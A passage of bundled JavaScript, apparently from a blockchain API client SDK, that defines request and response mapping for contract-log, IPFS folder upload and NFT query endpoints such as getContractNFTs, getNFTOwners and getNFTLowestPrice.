    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$F,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$F,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$F
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$F(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        block_number: request.blockNumber,
        from_block: request.fromBlock,
        to_block: request.toBlock,
        from_date: request.fromDate ? new Date(request.fromDate).toISOString() : undefined,
        to_date: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        topic0: request.topic0,
        topic1: request.topic1,
        topic2: request.topic2,
        topic3: request.topic3,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        disable_total: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$serializeRequest$F(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        blockNumber: request.blockNumber,
        fromBlock: request.fromBlock,
        toBlock: request.toBlock,
        fromDate: request.fromDate ? new Date(request.fromDate).toISOString() : undefined,
        toDate: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        topic0: request.topic0,
        topic1: request.topic1,
        topic2: request.topic2,
        topic3: request.topic3,
        limit: request.limit,
        cursor: request.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        disableTotal: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$F(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        blockNumber: jsonRequest.blockNumber,
        fromBlock: jsonRequest.fromBlock,
        toBlock: jsonRequest.toBlock,
        fromDate: jsonRequest.fromDate ? new Date(jsonRequest.fromDate) : undefined,
        toDate: jsonRequest.toDate ? new Date(jsonRequest.toDate) : undefined,
        topic0: jsonRequest.topic0,
        topic1: jsonRequest.topic1,
        topic2: jsonRequest.topic2,
        topic3: jsonRequest.topic3,
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        disableTotal: jsonRequest.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$F(jsonResponse, request, core) {
    var _a, _b;
    return (_b = (_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []) === null || _b === void 0 ? void 0 : _b.map(function(log) {
        return $3dfc2d9370ba0cd1$export$138ade50fb8052f5.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(log)), {
            topics: [
                log.topic0,
                log.topic1,
                log.topic2,
                log.topic3
            ],
            blockNumber: Number(log.block_number),
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core)
        }));
    });
}
/** Upload multiple files to IPFS and place them in a folder directory. */ var $3dfc2d9370ba0cd1$export$cc02ac16615509b4 = {
    method: "POST",
    name: "uploadFolder",
    id: "uploadFolder",
    groupName: "ipfs",
    urlPathPattern: "/ipfs/uploadFolder",
    bodyType: "raw",
    bodyParamNames: [
        "abi"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$E,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$E,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$E,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$E,
    getRequestBody: $3dfc2d9370ba0cd1$var$getRequestBody$2
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$E(_) {
    return {};
}
function $3dfc2d9370ba0cd1$var$getRequestBody$2(request) {
    return request.abi;
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$E(jsonResponse) {
    return jsonResponse;
}
function $3dfc2d9370ba0cd1$var$serializeRequest$E(request) {
    return {
        abi: JSON.stringify(request.abi)
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$E(jsonRequest) {
    return {
        abi: JSON.parse(jsonRequest.abi)
    };
}
/**
 * Get NFTs for a given contract address, including metadata for all NFTs (where available).
 * * Results are limited to 100 per page by default
 * * Requests for contract addresses not yet indexed will automatically start the indexing process for that NFT collection.
 */ var $3dfc2d9370ba0cd1$export$1a7550f6b237748b = {
    method: "GET",
    name: "getContractNFTs",
    id: "getContractNFTs",
    groupName: "nft",
    urlPathPattern: "/nft/{address}",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "format",
        "limit",
        "totalRanges",
        "range",
        "cursor",
        "normalizeMetadata",
        "disableTotal",
        "mediaItems"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$D,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$D,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$D,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$D
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$D(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        format: request.format,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        totalRanges: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.totalRanges, String),
        range: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.range, String),
        cursor: request.cursor,
        normalizeMetadata: request.normalizeMetadata,
        disable_total: request.disableTotal,
        media_items: request.mediaItems
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$D(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(data) {
        var chain = $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core);
        var nft = (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(data);
        return $3dfc2d9370ba0cd1$export$29af622dd51db3c5.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(nft)), {
            chain: chain,
            ownerOf: nft.ownerOf ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(nft.ownerOf) : undefined,
            lastMetadataSync: nft.lastMetadataSync ? new Date(nft.lastMetadataSync) : undefined,
            lastTokenUriSync: nft.lastTokenUriSync ? new Date(nft.lastTokenUriSync) : undefined,
            media: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(nft.media, function(media) {
                return $3dfc2d9370ba0cd1$export$e5237d1bf4cd5e83.create($3dfc2d9370ba0cd1$var$__assign({
                    chain: chain
                }, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(media)));
            })
        }));
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$D(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        format: request.format,
        limit: request.limit,
        totalRanges: request.totalRanges,
        range: request.range,
        cursor: request.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        normalizeMetadata: request.normalizeMetadata,
        disableTotal: request.disableTotal,
        mediaItems: request.mediaItems
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$D(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        format: jsonRequest.format,
        limit: jsonRequest.limit,
        totalRanges: jsonRequest.totalRanges,
        range: jsonRequest.range,
        cursor: jsonRequest.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        normalizeMetadata: jsonRequest.normalizeMetadata,
        disableTotal: jsonRequest.disableTotal,
        mediaItems: jsonRequest.mediaItems
    };
}
/**
 * Get NFTs for a given contract address, including metadata for all NFTs (where available).
 * * Results are limited to 100 per page by default
 * * Requests for contract addresses not yet indexed will automatically start the indexing process for that NFT collection.
 */ var $3dfc2d9370ba0cd1$export$254df2181393dbc7 = {
    method: "POST",
    name: "getMultipleNFTs",
    id: "getMultipleNFTs",
    groupName: "nft",
    urlPathPattern: "/nft/getMultipleNFTs",
    urlSearchParamNames: [
        "chain"
    ],
    bodyType: "properties",
    bodyParamNames: [
        "tokens",
        "normalizeMetadata",
        "mediaItems"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$C,
    getRequestBody: $3dfc2d9370ba0cd1$var$getRequestBody$1,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$C,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$C,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$C
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$C(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex
    };
}
function $3dfc2d9370ba0cd1$var$getRequestBody$1(request) {
    return {
        tokens: request.tokens.map(function(token) {
            return {
                token_address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(token.tokenAddress).lowercase,
                token_id: token.tokenId
            };
        }),
        normalizeMetadata: request.normalizeMetadata,
        media_items: request.mediaItems
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$C(jsonResponse, request, core) {
    return (jsonResponse !== null && jsonResponse !== void 0 ? jsonResponse : []).map(function(data) {
        if (data === null) return null;
        var chain = $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core);
        var nft = (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(data);
        return $3dfc2d9370ba0cd1$export$29af622dd51db3c5.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(nft)), {
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            amount: nft.amount ? parseInt(nft.amount, 10) : undefined,
            ownerOf: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(nft.ownerOf),
            lastMetadataSync: (0, $10891f2cb3e98601$export$8b9fef4a5a83984)(nft.lastMetadataSync),
            lastTokenUriSync: (0, $10891f2cb3e98601$export$8b9fef4a5a83984)(nft.lastTokenUriSync),
            media: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(nft.media, function(media) {
                return $3dfc2d9370ba0cd1$export$e5237d1bf4cd5e83.create($3dfc2d9370ba0cd1$var$__assign({
                    chain: chain
                }, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(media)));
            })
        }));
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$C(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        normalizeMetadata: request.normalizeMetadata,
        tokens: request.tokens.map(function(token) {
            return {
                tokenAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(token.tokenAddress).lowercase,
                tokenId: token.tokenId
            };
        }),
        mediaItems: request.mediaItems
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$C(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        normalizeMetadata: jsonRequest.normalizeMetadata,
        tokens: jsonRequest.tokens.map(function(token) {
            return {
                tokenAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(token.tokenAddress),
                tokenId: token.tokenId
            };
        }),
        mediaItems: jsonRequest.mediaItems
    };
}
/**
 * Get the collection / contract level metadata for a given contract (name, symbol, base token uri).
 * * Requests for contract addresses not yet indexed will automatically start the indexing process for that NFT collection
 */ var $3dfc2d9370ba0cd1$export$bc5bdb9c52bdbae0 = {
    method: "GET",
    name: "getNFTContractMetadata",
    id: "getNFTContractMetadata",
    groupName: "nft",
    isNullable: true,
    urlPathPattern: "/nft/{address}/metadata",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$B,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$B,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$B,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$B
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$B(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$B(jsonResponse, request, core) {
    return $3dfc2d9370ba0cd1$export$fb4c254d0c6233de.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(jsonResponse)), {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
        tokenAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonResponse.token_address),
        syncedAt: jsonResponse.synced_at ? new Date(jsonResponse.synced_at) : null,
        contractType: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(jsonResponse.contract_type)
    }));
}
function $3dfc2d9370ba0cd1$var$serializeRequest$B(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$B(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address)
    };
}
/** Get transfers of NFTs for a given contract and other parameters. */ var $3dfc2d9370ba0cd1$export$91aa7fb1b02fe81d = {
    method: "GET",
    name: "getNFTContractTransfers",
    id: "getNFTContractTransfers",
    groupName: "nft",
    urlPathPattern: "/nft/{address}/transfers",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "format",
        "limit",
        "cursor",
        "fromBlock",
        "fromDate",
        "toBlock",
        "toDate",
        "disableTotal"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$A,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$A,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$A,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$A
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$A(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        format: request.format,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        from_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromBlock, String),
        from_date: request.fromDate ? new Date(request.fromDate).toISOString() : undefined,
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        to_date: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        cursor: request.cursor,
        disable_total: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$A(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(transfer) {
        return $3dfc2d9370ba0cd1$export$b04bf5e0fc45755d.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(transfer)), {
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            tokenAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.to_address),
            toAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.to_address),
            operator: transfer.operator ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.operator) : null,
            fromAddress: transfer.from_address ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.from_address) : null,
            value: transfer.value ? $3dfc2d9370ba0cd1$export$62862bdd1f71aa78.create(transfer.value, "wei") : null,
            blockTimestamp: new Date(transfer.block_timestamp)
        }));
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$A(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        format: request.format,
        limit: request.limit,
        cursor: request.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        fromBlock: request.fromBlock,
        toBlock: request.toBlock,
        fromDate: request.fromDate ? new Date(request.fromDate).toISOString() : undefined,
        toDate: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        disableTotal: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$A(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        format: jsonRequest.format,
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        fromBlock: jsonRequest.fromBlock,
        toBlock: jsonRequest.toBlock,
        fromDate: jsonRequest.fromDate ? new Date(jsonRequest.fromDate) : undefined,
        toDate: jsonRequest.toDate ? new Date(jsonRequest.toDate) : undefined,
        disableTotal: jsonRequest.disableTotal
    };
}
/** Get the lowest executed price for an NFT contract for the last x days (only trades paid in ETH). */ var $3dfc2d9370ba0cd1$export$54a4252f1046e878 = {
    method: "GET",
    name: "getNFTLowestPrice",
    id: "getNFTLowestPrice",
    groupName: "nft",
    isNullable: true,
    urlPathPattern: "/nft/{address}/lowestprice",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "days",
        "marketplace"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$z,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$z,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$z,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$z
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$z(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        days: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.days, String),
        marketplace: request.marketplace
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$z(jsonResponse) {
    return $3dfc2d9370ba0cd1$export$af80c79c3efd2de2.fromJSON(jsonResponse);
}
function $3dfc2d9370ba0cd1$var$serializeRequest$z(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        days: request.days,
        marketplace: request.marketplace,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$z(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        days: jsonRequest.days,
        marketplace: jsonRequest.marketplace,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address)
    };
}
/**
 * Get NFT data, including metadata (where available), for the given NFT token ID and contract address.
 * * Requests for contract addresses not yet indexed will automatically start the indexing process for that NFT collection
 */ var $3dfc2d9370ba0cd1$export$4767c6e68c3a24f7 = {
    method: "GET",
    name: "getNFTMetadata",
    id: "getNFTMetadata",
    groupName: "nft",
    isNullable: true,
    urlPathPattern: "/nft/{address}/{tokenId}",
    urlPathParamNames: [
        "address",
        "tokenId"
    ],
    urlSearchParamNames: [
        "chain",
        "format",
        "normalizeMetadata",
        "mediaItems"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$y,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$y,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$y,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$y
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$y(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        tokenId: request.tokenId,
        format: request.format,
        normalizeMetadata: request.normalizeMetadata,
        media_items: request.mediaItems
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$y(jsonResponse, request, core) {
    var chain = $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core);
    var nft = (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(jsonResponse);
    return $3dfc2d9370ba0cd1$export$29af622dd51db3c5.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, nft), {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
        ownerOf: nft.ownerOf ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(nft.ownerOf) : undefined,
        lastMetadataSync: nft.lastMetadataSync ? new Date(nft.lastMetadataSync) : undefined,
        lastTokenUriSync: nft.lastTokenUriSync ? new Date(nft.lastTokenUriSync) : undefined,
        media: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(nft.media, function(media) {
            return $3dfc2d9370ba0cd1$export$e5237d1bf4cd5e83.create($3dfc2d9370ba0cd1$var$__assign({
                chain: chain
            }, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(media)));
        })
    }));
}
function $3dfc2d9370ba0cd1$var$serializeRequest$y(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        format: request.format,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        tokenId: request.tokenId,
        normalizeMetadata: request.normalizeMetadata,
        mediaItems: request.mediaItems
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$y(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        format: jsonRequest.format,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        tokenId: jsonRequest.tokenId,
        normalizeMetadata: jsonRequest.normalizeMetadata,
        mediaItems: jsonRequest.mediaItems
    };
}
/**
 * Get owners of NFTs for a given contract.
 * * Requests for contract addresses not yet indexed will automatically start the indexing process for that NFT collection.
 */ var $3dfc2d9370ba0cd1$export$3f6c30a742da9ae = {
    method: "GET",
    name: "getNFTOwners",
    id: "getNFTOwners",
    groupName: "nft",
    urlPathPattern: "/nft/{address}/owners",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "format",
        "limit",
        "cursor",
        "normalizeMetadata",
        "disableTotal",
        "mediaItems"
    ],
    firstPageIndex: 1,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$x,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$x,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$x,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$x
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$x(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        format: request.format,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor,
        normalizeMetadata: request.normalizeMetadata,
        disable_total: request.disableTotal,
        media_items: request.mediaItems
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$x(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(data) {
        var chain = $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core);
        var nft = (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(data);
        return $3dfc2d9370ba0cd1$export$29af622dd51db3c5.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, nft), {
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            ownerOf: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(nft.ownerOf),
            lastMetadataSync: new Date(nft.lastMetadataSync),
            lastTokenUriSync: new Date(nft.lastTokenUriSync),
            media: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(nft.media, function(media) {
                return $3dfc2d9370ba0cd1$export$e5237d1bf4cd5e83.create($3dfc2d9370ba0cd1$var$__assign({
                    chain: chain
                }, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(media)));
            })
        }));
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$x(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        format: request.format,
        limit: request.limit,
        cursor: request.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        normalizeMetadata: request.normalizeMetadata,
        disableTotal: request.disableTotal,
        mediaItems: request.mediaItems
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$x(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        format: jsonRequest.format,
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        normalizeMetadata: jsonRequest.normalizeMetadata,
        disableTotal: jsonRequest.disableTotal,
        mediaItems: jsonRequest.mediaItems
    };
}
/**
 * Get owners of a specific NFT given the contract address and token ID.
 * * Requests for contract addresses not yet indexed will automatically start the indexing process for that NFT collection
 */ var $3dfc2d9370ba0cd1$export$ac0acee6dae00396 = {
    method: "GET",
    name: "getNFTTokenIdOwners",
    id: "getNFTTokenIdOwners",
    groupName: "nft",
    urlPathPattern: "/nft/{address}/{tokenId}/owners",
    urlPathParamNames: [
        "address",
        "tokenId"
    ],
    urlSearchParamNames: [
        "chain",
        "format",
        "limit",
        "cursor",
        "normalizeMetadata",
        "disableTotal",
        "mediaItems"
    ],
    firstPageIndex: 1,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$w,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$w,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$w,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$w
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$w(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        format: request.format,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor,
        tokenId: request.tokenId,
        normalizeMetadata: request.normalizeMetadata,
        disable_total: request.disableTotal,
        media_items: request.mediaItems
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$w(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(data) {
        var chain = $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core);
        var nft = (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(data);
        return $3dfc2d9370ba0cd1$export$29af622dd51db3c5.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(nft)), {
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            ownerOf: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(nft.ownerOf),
            lastMetadataSync: new Date(nft.lastMetadataSync),
            lastTokenUriSync: new Date(nft.lastTokenUriSync),
            media: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(nft.media, function(media) {
                return $3dfc2d9370ba0cd1$export$e5237d1bf4cd5e83.create($3dfc2d9370ba0cd1$var$__assign({
                    chain: chain
                }, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(media)));
            })
        }));
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$w(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        format: request.format,
        limit: request.limit,
        cursor: request.cursor,
